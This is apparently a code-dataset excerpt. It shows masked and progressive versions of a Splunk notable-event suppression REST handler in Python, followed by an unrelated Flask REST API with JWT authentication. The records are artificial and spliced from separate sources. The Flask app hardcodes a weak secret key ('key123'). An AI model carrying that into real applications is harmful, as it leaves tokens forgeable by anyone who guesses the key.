admin.ArgValidationException('No name provided')\n log_data = {'status': 'success', 'action': 'edit', 'signature':\n 'Notable event suppression successfully saved', 'suppression':\n name[len(NotableEventSuppression.SUPPRESSION_START):], 'user':\n conf['eai:userName']}\n for key, val in conf.items():\n if key in args.data:\n new_value = args[key][0]\n if new_value in [None, '']:\n new_value = ' '\n if key == self.PARAM_DISABLED:\n conf_key = util.normalizeBoolean(conf[key],\n enableStrictMode=True)\n new_value = util.normalizeBoolean(new_value,\n enableStrictMode=True)\n if conf_key != new_value:\n log_data['action'\n ] = 'disable' if new_value else 'enable'\n log_data['signature'] = (\n 'Suppression successfully disabled' if\n new_value else 'Suppression successfully enabled')\n conf[key] = new_value\n if key == admin.EAI_ENTRY_ACL:\n for k, v in self.CONF_KEY_MAPPING.iteritems():\n if k in val and val[k] is not None and len(val[k]) > 0:\n setattr(conf, v, val[k])\n if conf.namespace is None or len(conf.namespace) == 0:\n conf.namespace = Suppressions.DEFAULT_NAMESPACE\n if conf.owner is None or len(conf.owner) == 0:\n conf.owner = Suppressions.DEFAULT_OWNER\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The edit attempt for the suppression '%s' produced an invalid configuration: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n if log_data['action'] == 'edit':\n log_data['signature'] = 'Unable to save the event suppression'\n elif log_data['action'] == 'enable':\n log_data['signature'\n ] = 'Error occurred while enabling the suppression: ' + str(\n e)\n else:\n log_data['signature'\n ] = 'Error occurred while disabling the suppression: ' + str(\n e)\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info(\"Successfully updated the '%s' suppression\", name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleRemove(self, confInfo):\n owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id,\n namespace=self.appName, owner=owner, sessionKey=self.\n getSessionKey())\n\n @staticmethod\n def checkConf(settings, stanza=None, confInfo=None,\n throwExceptionOnError=False):\n \"\"\"\n Checks the settings and raises an exception if the configuration is invalid.\n \"\"\"\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n if stanza is not None and confInfo is not None:\n for key, val in settings.items():\n if val is None:\n val = ''\n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n else:\n pass\n logger.info(\"Checking general settings for the '%s' suppression\",\n stanza)\n for key, val in settings.items():\n if val is None:\n val = ''\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n except ValueError:\n raise 
InvalidParameterValueException(key, val,\n 'must be a valid boolean')\n elif key in Suppressions.REQUIRED_PARAMS:\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n elif key in Suppressions.VALID_PARAMS:\n pass\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n elif throwExceptionOnError:\n raise UnsupportedParameterException()\n else:\n logger.warn(\n \"The configuration for '%s' contains an unsupported parameter: %s\"\n , stanza, key)\n if len(required_fields) > 0:\n raise InvalidConfigException(\n 'The following fields must be defined in the configuration but were not: '\n + ', '.join(required_fields).strip())\n\n\n<mask token>\n",
"step-4": "<mask token>\nif sys.platform == 'win32':\n import os, msvcrt\n msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)\n msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)\n msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)\n<mask token>\nsys.path.append(make_splunkhome_path(['etc', 'apps', 'SA-Utils', 'lib']))\n<mask token>\nlogger.setLevel(logging.INFO)\n\n\nclass InvalidConfigException(Exception):\n pass\n\n\nclass InvalidParameterValueException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that has an invalid value.\n \"\"\"\n\n def __init__(self, field, value, value_must_be):\n message = (\n \"The value for the parameter '%s' is invalid: %s (was %s)\" % (\n field, value_must_be, value))\n super(InvalidConfigException, self).__init__(message)\n\n\nclass UnsupportedParameterException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that is unsupported.\n \"\"\"\n pass\n\n\nclass MissingTransitionException(InvalidConfigException):\n \"\"\"\n Describes a capability that is missing.\n \"\"\"\n\n def __init__(self, transitions):\n self.transitions = transitions\n super(InvalidConfigException, self).__init__(\n 'Missing transition detected')\n\n\ndef _getFieldValue(args, name, default_value=None, max_length=None):\n \"\"\"Get the field value from the argument list.\"\"\"\n value = args[name][0] or default_value if name in args else default_value\n if value and max_length and len(value) > max_length:\n raise admin.ArgValidationException(\n 'App %s cannot be longer than %s character%s.' % (name,\n max_length, 's' if max_length > 1 else ''))\n return value\n\n\ndef _addToDictIfNonNull(d, name, value):\n \"\"\"Add the given name and value to the dictionary if the value is not none.\n \n Arguments:\n d -- the dictionary to add to\n name -- the name of the object to add\n value -- the value of the object to add (if not none)\n \"\"\"\n if value is not None:\n d[name] = value\n\n\nclass Suppressions(admin.MConfigHandler):\n \"\"\"\n Set up supported arguments\n \"\"\"\n REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4':\n 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32':\n 'ACTION_RELOAD'}\n WRITE_CAPABILITY = 'edit_suppressions'\n PARAM_DISABLED = 'disabled'\n PARAM_SEARCH = 'search'\n PARAM_DESCRIPTION = 'description'\n VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]\n REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]\n CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}\n DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'\n DEFAULT_OWNER = 'nobody'\n DEFAULT_DISABLED = 0\n\n def setup(self):\n logger.info('Setting up suppressions_rest_handler')\n self.setWriteCapability(Suppressions.WRITE_CAPABILITY)\n if (self.requestedAction == admin.ACTION_EDIT or self.\n requestedAction == admin.ACTION_CREATE):\n for arg in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addReqArg(arg)\n for arg in Suppressions.VALID_PARAMS:\n if arg not in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addOptArg(arg)\n\n def handleCreate(self, confInfo):\n \"\"\"Handles creation of a suppression.\"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs.data\n if not name or len(name) == 0:\n raise admin.ArgValidationException(\n 'The name of the suppression must not be empty')\n nameMatch = 
NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention')\n if name in self.readConf('eventtypes'):\n raise admin.AlreadyExistsException(\n 'A suppression entry already exists for %s' % name)\n disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)\n search = _getFieldValue(args, Suppressions.PARAM_SEARCH)\n description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)\n conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self\n .getSessionKey())\n conf.namespace = self.appName\n conf.owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n conf['name'] = name\n _addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)\n _addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)\n _addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)\n log_data = {'action': 'create', 'suppression': conf['name'][len(\n NotableEventSuppression.SUPPRESSION_START):], 'user': conf[\n 'eai:acl']['owner'], 'status': 'success', 'signature':\n 'Notable event suppression successfully created'}\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The configuration for the new suppression '%s' is invalid and could not be created: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n log_data['signature'] = 'Unable to save the event suppression'\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info('Successfully added suppression: %s', name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleCustom(self, confInfo):\n logger.info('Handling custom action: %s', self.customAction)\n if self.customAction == '_autodisable':\n expired_count, enabled_count = (NotableEventSuppression.\n disable_expired_suppressions(session_key=self.getSessionKey()))\n logger.info(\n '%s expired suppressions detected; %s were enabled (now disabled)'\n , expired_count, enabled_count)\n else:\n self.actionNotImplemented()\n\n def handleList(self, confInfo):\n \"\"\"\n Handles listing of a suppression\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n suppressionDict = self.readConfCtx('eventtypes')\n if suppressionDict != None:\n for stanza, settings in suppressionDict.items():\n stanzaMatch = NotableEventSuppression.suppressionRE.match(\n stanza)\n if stanzaMatch:\n try:\n Suppressions.checkConf(settings, stanza, confInfo)\n except InvalidConfigException as e:\n logger.error(\n \"The configuration for suppression '%s' is invalid: %s\"\n , stanza, str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleReload(self, confInfo=None, makeCSV=True):\n \"\"\"\n Handles refresh/reload of the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n 
logger.info(\n 'Refreshing suppression configurations via properties endpoint')\n try:\n refreshInfo = entity.refreshEntities('properties/eventtypes',\n sessionKey=self.getSessionKey())\n except Exception as e:\n logger.warn(\n 'Could not refresh suppression configurations via properties endpoint: %s'\n , str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleEdit(self, confInfo):\n \"\"\"\n Handles edits to the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs\n if name is not None:\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention'\n )\n try:\n conf = entity.getEntity('saved/eventtypes', name,\n sessionKey=self.getSessionKey())\n except ResourceNotFound:\n raise admin.NotFoundException(\n \"A suppression configuration with the given name '%s' could not be found\"\n % name)\n else:\n raise admin.ArgValidationException('No name provided')\n log_data = {'status': 'success', 'action': 'edit', 'signature':\n 'Notable event suppression successfully saved', 'suppression':\n name[len(NotableEventSuppression.SUPPRESSION_START):], 'user':\n conf['eai:userName']}\n for key, val in conf.items():\n if key in args.data:\n new_value = args[key][0]\n if new_value in [None, '']:\n new_value = ' '\n if key == self.PARAM_DISABLED:\n conf_key = util.normalizeBoolean(conf[key],\n enableStrictMode=True)\n new_value = util.normalizeBoolean(new_value,\n enableStrictMode=True)\n if conf_key != new_value:\n log_data['action'\n ] = 'disable' if new_value else 'enable'\n log_data['signature'] = (\n 'Suppression successfully disabled' if\n new_value else 'Suppression successfully enabled')\n conf[key] = new_value\n if key == admin.EAI_ENTRY_ACL:\n for k, v in self.CONF_KEY_MAPPING.iteritems():\n if k in val and val[k] is not None and len(val[k]) > 0:\n setattr(conf, v, val[k])\n if conf.namespace is None or len(conf.namespace) == 0:\n conf.namespace = Suppressions.DEFAULT_NAMESPACE\n if conf.owner is None or len(conf.owner) == 0:\n conf.owner = Suppressions.DEFAULT_OWNER\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The edit attempt for the suppression '%s' produced an invalid configuration: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n if log_data['action'] == 'edit':\n log_data['signature'] = 'Unable to save the event suppression'\n elif log_data['action'] == 'enable':\n log_data['signature'\n ] = 'Error occurred while enabling the suppression: ' + str(\n e)\n else:\n log_data['signature'\n ] = 'Error occurred while disabling the suppression: ' + str(\n e)\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info(\"Successfully updated the '%s' suppression\", name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleRemove(self, confInfo):\n 
owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id,\n namespace=self.appName, owner=owner, sessionKey=self.\n getSessionKey())\n\n @staticmethod\n def checkConf(settings, stanza=None, confInfo=None,\n throwExceptionOnError=False):\n \"\"\"\n Checks the settings and raises an exception if the configuration is invalid.\n \"\"\"\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n if stanza is not None and confInfo is not None:\n for key, val in settings.items():\n if val is None:\n val = ''\n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n else:\n pass\n logger.info(\"Checking general settings for the '%s' suppression\",\n stanza)\n for key, val in settings.items():\n if val is None:\n val = ''\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n except ValueError:\n raise InvalidParameterValueException(key, val,\n 'must be a valid boolean')\n elif key in Suppressions.REQUIRED_PARAMS:\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n elif key in Suppressions.VALID_PARAMS:\n pass\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n elif throwExceptionOnError:\n raise UnsupportedParameterException()\n else:\n logger.warn(\n \"The configuration for '%s' contains an unsupported parameter: %s\"\n , stanza, key)\n if len(required_fields) > 0:\n raise InvalidConfigException(\n 'The following fields must be defined in the configuration but were not: '\n + ', '.join(required_fields).strip())\n\n\nadmin.init(Suppressions, admin.CONTEXT_APP_AND_USER)\n",
"step-5": "\"\"\"\nCopyright (C) 2005 - 2016 Splunk Inc. All Rights Reserved.\n\"\"\"\nimport logging\nimport sys\n\nif sys.platform == \"win32\":\n import os, msvcrt\n msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)\n msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)\n msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)\n\nimport splunk.admin as admin\nimport splunk.entity as entity\nimport splunk.util as util\n\nfrom notable_event_suppression import NotableEventSuppression\nfrom splunk import ResourceNotFound\nfrom splunk.clilib.bundle_paths import make_splunkhome_path\nsys.path.append(make_splunkhome_path([\"etc\", \"apps\", \"SA-Utils\", \"lib\"]))\nfrom SolnCommon.log import setup_logger, SHORT_FORMAT\n\nlogger = setup_logger('suppressions_rest_handler', format=SHORT_FORMAT)\nlogger.setLevel(logging.INFO)\n\n\nclass InvalidConfigException(Exception):\n pass\n\n\nclass InvalidParameterValueException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that has an invalid value.\n \"\"\"\n \n def __init__(self, field, value, value_must_be):\n message = \"The value for the parameter '%s' is invalid: %s (was %s)\" % (field, value_must_be, value)\n super(InvalidConfigException, self).__init__(message)\n \n \nclass UnsupportedParameterException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that is unsupported.\n \"\"\"\n pass\n\n\nclass MissingTransitionException(InvalidConfigException):\n \"\"\"\n Describes a capability that is missing.\n \"\"\"\n def __init__(self, transitions):\n self.transitions = transitions\n super(InvalidConfigException, self).__init__(\"Missing transition detected\")\n \n \ndef _getFieldValue(args, name, default_value=None, max_length=None):\n '''Get the field value from the argument list.'''\n \n # Get the value if defined or the default value if not defined\n value = args[name][0] or default_value if name in args else default_value\n \n # Check the length\n if value and max_length and len(value) > max_length:\n raise admin.ArgValidationException(\n 'App %s cannot be longer than %s character%s.' 
% (name, max_length, \"s\" if max_length > 1 else \"\"))\n return value\n \n\ndef _addToDictIfNonNull(d, name, value):\n '''Add the given name and value to the dictionary if the value is not none.\n \n Arguments:\n d -- the dictionary to add to\n name -- the name of the object to add\n value -- the value of the object to add (if not none)\n '''\n if value is not None:\n d[name] = value\n\n \nclass Suppressions(admin.MConfigHandler):\n '''\n Set up supported arguments\n '''\n # admin.py constants\n REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4': 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32': 'ACTION_RELOAD'}\n\n # Permissions\n WRITE_CAPABILITY = 'edit_suppressions'\n\n # Default Params\n PARAM_DISABLED = 'disabled'\n PARAM_SEARCH = 'search'\n PARAM_DESCRIPTION = 'description'\n \n VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]\n REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]\n \n # Configuration key mapping\n CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}\n \n # Default Vals\n DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'\n DEFAULT_OWNER = 'nobody'\n\n DEFAULT_DISABLED = 0\n \n def setup(self):\n logger.info('Setting up suppressions_rest_handler')\n \n # set write capability\n self.setWriteCapability(Suppressions.WRITE_CAPABILITY) \n \n if self.requestedAction == admin.ACTION_EDIT or self.requestedAction == admin.ACTION_CREATE: \n # Fill required params\n for arg in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addReqArg(arg)\n \n # Fill valid params\n for arg in Suppressions.VALID_PARAMS:\n if arg not in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addOptArg(arg)\n \n def handleCreate(self, confInfo):\n '''Handles creation of a suppression.'''\n \n # Get requested action\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n \n logger.info('Entering %s', actionStr)\n \n # Refresh\n self.handleReload()\n \n name = self.callerArgs.id\n args = self.callerArgs.data\n \n # Make sure the name is not empty\n if not name or len(name) == 0:\n raise admin.ArgValidationException(\"The name of the suppression must not be empty\")\n \n # Make sure the name follows the convention\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n \n if not nameMatch:\n raise admin.ArgValidationException(\"The name of the suppression must follow proper convention\")\n \n # Make sure the item does not already exist\n if name in self.readConf('eventtypes'):\n raise admin.AlreadyExistsException(\"A suppression entry already exists for %s\" % (name))\n \n # Get the field values\n disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)\n search = _getFieldValue(args, Suppressions.PARAM_SEARCH)\n description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)\n \n # Add the field values to a configuration dictionary (that will be verified)\n conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self.getSessionKey())\n \n conf.namespace = self.appName # always save things to SOME app context.\n conf.owner = self.context == admin.CONTEXT_APP_AND_USER and self.userName or \"-\"\n \n conf['name'] = name\n \n _addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)\n _addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)\n _addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)\n \n ## Notable Suppression Audit Log Data\n log_data = {\n 'action': 'create',\n 'suppression': 
conf['name'][len(NotableEventSuppression.SUPPRESSION_START):],\n 'user': conf['eai:acl']['owner'],\n 'status': 'success',\n 'signature': 'Notable event suppression successfully created'\n }\n \n # Check the configuration\n try:\n Suppressions.checkConf(conf, name)\n \n except InvalidConfigException as e:\n e = \"The configuration for the new suppression '%s' is invalid and could not be created: %s\" % (name, str(e))\n logger.error(e)\n log_data['status'] = 'failure'\n log_data['signature'] = 'Unable to save the event suppression'\n logger.error('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))\n raise admin.ArgValidationException(e)\n \n # Write out an update to the eventtypes config file\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n \n logger.info('Successfully added suppression: %s', name)\n \n # Reload suppressions\n self.handleReload()\n \n logger.info('%s completed successfully', actionStr)\n logger.info('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))\n\n def handleCustom(self, confInfo):\n logger.info('Handling custom action: %s', self.customAction)\n if self.customAction == '_autodisable':\n expired_count, enabled_count = NotableEventSuppression.disable_expired_suppressions(session_key=self.getSessionKey())\n logger.info(\"%s expired suppressions detected; %s were enabled (now disabled)\", expired_count, enabled_count)\n else:\n self.actionNotImplemented()\n\n def handleList(self, confInfo): \n \"\"\"\n Handles listing of a suppression\n \"\"\"\n # Get requested action\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n \n logger.info('Entering %s', actionStr)\n \n self.handleReload()\n \n # Get the configurations from suppression.conf\n suppressionDict = self.readConfCtx('eventtypes')\n \n # Get all suppressions and provide the relevant options\n if suppressionDict != None:\n # Check each conf\n for stanza, settings in suppressionDict.items():\n stanzaMatch = NotableEventSuppression.suppressionRE.match(stanza)\n \n if stanzaMatch:\n try:\n # Check config\n Suppressions.checkConf(settings, stanza, confInfo)\n \n except InvalidConfigException as e:\n logger.error(\"The configuration for suppression '%s' is invalid: %s\", stanza, str(e))\n \n logger.info('%s completed successfully', actionStr)\n\n def handleReload(self, confInfo=None, makeCSV=True):\n \"\"\"\n Handles refresh/reload of the configuration options\n \"\"\"\n # Get requested action\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n \n logger.info('Entering %s', actionStr)\n \n logger.info('Refreshing suppression configurations via properties endpoint')\n try:\n refreshInfo = entity.refreshEntities('properties/eventtypes', sessionKey=self.getSessionKey())\n except Exception as e:\n logger.warn('Could not refresh suppression configurations via properties endpoint: %s', str(e))\n \n logger.info('%s completed successfully', actionStr)\n \n def handleEdit(self, confInfo):\n \"\"\"\n Handles edits to the configuration options\n \"\"\"\n \n # Get requested action\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n \n logger.info('Entering %s', actionStr)\n 
\n # Refresh\n self.handleReload()\n \n name = self.callerArgs.id\n args = self.callerArgs\n \n if name is not None:\n # Make sure the name follows the convention\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n \n if not nameMatch:\n raise admin.ArgValidationException(\"The name of the suppression must follow proper convention\")\n \n try:\n conf = entity.getEntity('saved/eventtypes', name, sessionKey=self.getSessionKey())\n \n except ResourceNotFound:\n raise admin.NotFoundException(\"A suppression configuration with the given name '%s' could not be found\" % (name))\n \n else:\n # Stop if no name was provided\n raise admin.ArgValidationException(\"No name provided\")\n \n ## Notable Suppression Audit Log Data\n log_data = {\n 'status': 'success',\n 'action': 'edit',\n 'signature': 'Notable event suppression successfully saved',\n 'suppression': name[len(NotableEventSuppression.SUPPRESSION_START):],\n 'user': conf['eai:userName']\n }\n \n # Create the resulting configuration that would be persisted if the settings provided are applied\n for key, val in conf.items():\n if key in args.data:\n \n # Set the value to a single space so that the field is set to a blank value\n new_value = args[key][0]\n \n if new_value in [None, '']:\n new_value = ' '\n \n ## If a value other than the 'disabled' param is changed, it \n # came from the editor, otherwise the lister. \n if key == self.PARAM_DISABLED:\n conf_key = util.normalizeBoolean(conf[key], enableStrictMode=True)\n new_value = util.normalizeBoolean(new_value, enableStrictMode=True)\n if conf_key != new_value:\n log_data['action'] = 'disable' if new_value else 'enable'\n log_data['signature'] = 'Suppression successfully disabled' if new_value else 'Suppression successfully enabled'\n \n conf[key] = new_value\n \n if key == admin.EAI_ENTRY_ACL:\n for k, v in self.CONF_KEY_MAPPING.iteritems():\n if k in val and val[k] is not None and len(val[k]) > 0:\n setattr(conf, v, val[k])\n \n if conf.namespace is None or len(conf.namespace) == 0:\n conf.namespace = Suppressions.DEFAULT_NAMESPACE\n \n if conf.owner is None or len(conf.owner) == 0:\n conf.owner = Suppressions.DEFAULT_OWNER\n \n try:\n # Check config\n Suppressions.checkConf(conf, name)\n \n except InvalidConfigException as e:\n e = \"The edit attempt for the suppression '%s' produced an invalid configuration: %s\" % (name, str(e))\n logger.error(e)\n log_data['status'] = 'failure'\n if log_data['action'] == 'edit':\n log_data['signature'] = 'Unable to save the event suppression'\n elif log_data['action'] == 'enable':\n log_data['signature'] = 'Error occurred while enabling the suppression: ' + str(e)\n else:\n log_data['signature'] = 'Error occurred while disabling the suppression: ' + str(e)\n \n logger.error('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))\n raise admin.ArgValidationException(e)\n \n # Write out an update to the eventtypes config file\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n \n # Log that the suppression was updated\n logger.info(\"Successfully updated the '%s' suppression\", name)\n \n # Reload suppressions\n self.handleReload()\n \n logger.info('%s completed successfully', actionStr)\n \n logger.info('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))\n \n def handleRemove(self, confInfo):\n owner = ((self.context == admin.CONTEXT_APP_AND_USER) and self.userName) 
or \"-\"\n entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id, namespace=self.appName, owner=owner, sessionKey=self.getSessionKey())\n \n @staticmethod\n def checkConf(settings, stanza=None, confInfo=None, throwExceptionOnError=False):\n \"\"\"\n Checks the settings and raises an exception if the configuration is invalid.\n \"\"\" \n # Below is a list of the required fields. The entries in this list will be removed as they\n # are observed. An empty list at the end of the config check indicates that all necessary\n # fields where provided.\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n \n if stanza is not None and confInfo is not None:\n # Add each of the settings\n for key, val in settings.items():\n # Set val to empty if None\n if val is None:\n val = ''\n \n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n \n # Key is eai; Set meta \n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n \n # Key is eai; userName/appName\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n \n # Key is not proper\n else:\n pass\n \n # Check each of the settings individually\n logger.info(\"Checking general settings for the '%s' suppression\", stanza)\n for key, val in settings.items():\n # Set val to empty if None\n if val is None:\n val = ''\n \n # Check the disabled/selected value\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n \n # Remove the field from the list of required fields\n try:\n required_fields.remove(key)\n \n except ValueError:\n pass # Field not available, probably because it is not required\n \n except ValueError:\n raise InvalidParameterValueException(key, val, \"must be a valid boolean\")\n \n elif key in Suppressions.REQUIRED_PARAMS:\n # Remove the field from the list of required fields\n try:\n required_fields.remove(key)\n \n except ValueError:\n pass # Field not available, probably because it is not required\n \n elif key in Suppressions.VALID_PARAMS:\n pass\n \n # Key is eai\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n \n # Key is not proper\n else:\n if throwExceptionOnError:\n raise UnsupportedParameterException()\n \n else:\n logger.warn(\"The configuration for '%s' contains an unsupported parameter: %s\", stanza, key)\n\n # Error if some of the required fields were not provided\n if len(required_fields) > 0:\n raise InvalidConfigException('The following fields must be defined in the configuration but were not: ' + ', '.join(required_fields).strip())\n\n \n# initialize the handler\nadmin.init(Suppressions, admin.CONTEXT_APP_AND_USER)",
"step-ids": [
14,
16,
18,
23,
26
]
}
|
[
14,
16,
18,
23,
26
] |
# create item based on name using post method, get specific item or list of items using get method, update item using put and delete item using del method.
import os
from flask import Flask
from flask_restful import Api
from flask_jwt import JWT, timedelta
from security import authenticate, identity
from resources.user import UserRegister
from resources.item import Item,ItemList
from resources.store import Store, StoreList
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', 'sqlite:///data.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False # turn off flask SQLAlchemy modification.
app.secret_key = 'key123'
api = Api(app)
jwt = JWT(app, authenticate, identity)
api.add_resource(Store,'/store/<string:name>')
api.add_resource(Item,'/item/<string:name>') # http://localhost:5000/student/Rolf
api.add_resource(ItemList,'/items')
api.add_resource(StoreList,'/stores')
api.add_resource(UserRegister, '/register')
if __name__ == '__main__':
from db import db
db.init_app(app)
app.run(debug=True)
|
normal
|
{
"blob_id": "7525691ece4fe66bb175e470db3ac78f701e3730",
"index": 199,
"step-1": "<mask token>\n",
